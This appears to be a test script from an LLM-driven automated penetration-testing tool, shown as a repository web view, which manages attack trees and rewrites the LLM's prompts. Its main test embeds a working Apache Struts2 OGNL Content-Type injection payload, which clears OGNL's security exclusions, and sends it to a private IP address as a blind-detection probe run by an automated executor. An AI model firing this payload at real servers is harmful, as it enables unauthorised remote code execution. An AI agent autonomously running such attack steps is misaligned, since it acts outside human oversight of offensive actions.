You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

141 lines
5.1 KiB

import re
2 months ago
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
1 week ago
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
import textwrap
1 week ago
class Mytest:
def update_node_inter(self,attack_index):
attack_tree = g_PKM.ReadData(attack_index)
nodes = attack_tree.traverse_dfs()
# 06-0=>p
instr = nodes[6].get_instr_user().pop(0)
nodes[6].parent.get_instr_user().append(instr)
# 39-1
instr = nodes[39].get_instr_user().pop(1)
nodes[39].parent.get_instr_user().append(instr)
# 49-0
instr = nodes[49].get_instr_user().pop(0)
nodes[49].parent.get_instr_user().append(instr)
1 week ago
g_PKM.WriteData(attack_tree, attack_index)
1 week ago
if __name__ == "__main__":
# 示例使用
mytest = Mytest()
LLM = LLMManager(1)
PythonM = PythonTManager(myCongif.get_data("Python_max_procs"))
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 16
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip",None)
1 week ago
if test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
str_instr = '''python-code
import requests
def dynamic_fun():
1 week ago
# 基于布尔条件的盲注检测
true_condition = "'test'=='test'"
false_condition = "'test'=='wrong'"
payload_template = (
"%{(#_='multipart/form-data')."
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
"(#_memberAccess?(#_memberAccess=#dm):"
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#ognlUtil.getExcludedPackageNames().clear())"
".(#ognlUtil.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))."
f"(#result=@java.lang.Boolean@parseBoolean({{}}))}}"
)
try:
1 week ago
# 发送真条件请求
true_payload = payload_template.format(true_condition)
r_true = requests.get(
'http://192.168.204.137',
headers={'Content-Type': true_payload},
timeout=10
)
# 发送假条件请求
false_payload = payload_template.format(false_condition)
r_false = requests.get(
'http://192.168.204.137',
headers={'Content-Type': false_payload},
timeout=10
)
# 对比响应差异
if r_true.status_code != r_false.status_code:
return (True, f'Different status codes detected (True: {r_true.status_code} vs False: {r_false.status_code})')
if len(r_true.content) != len(r_false.content):
return (True, f'Content length difference detected (True: {len(r_true.content)} vs False: {len(r_false.content)})')
return (False, 'No observable differences between true/false conditions')
except Exception as e:
1 week ago
return (False, f'Request failed: {str(e)}')
'''
#str_instr = str_instr.strip() + " --max-time 10"
dedented_code = textwrap.dedent(str_instr.strip())
#对多shell指令的情况进行处理--也有风险
if "python-code" not in dedented_code:
if "&&" in dedented_code:
dedented_code = task_Object.mill_instr_preprocess(dedented_code, "&&")
elif "||" in dedented_code:
dedented_code = task_Object.mill_instr_preprocess(dedented_code, "||")
instr, reslut, source_result, ext_params = g_instrM.execute_instruction(dedented_code)
else:
instr, reslut, source_result, ext_params = PythonM.execute_instruction(dedented_code)
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
cur_node = nodes[78]
commands = [
]
for cmd in commands:
cur_node.add_instr(cmd)
cur_node.update_work_status(1)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
elif test_type ==3: #按格式读取指令
pass
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("6")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
1 week ago
testnode = TreeNode("test", 0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.messages[0]["content"]
# print(systems)
# 遍历node,查看有instr的ndoe
nodes = attact_tree.traverse_bfs()
for node in nodes:
node.messages[0]["content"] = systems
g_PKM.WriteData(attact_tree, "6")
print("完成Messgae更新")
else:
pass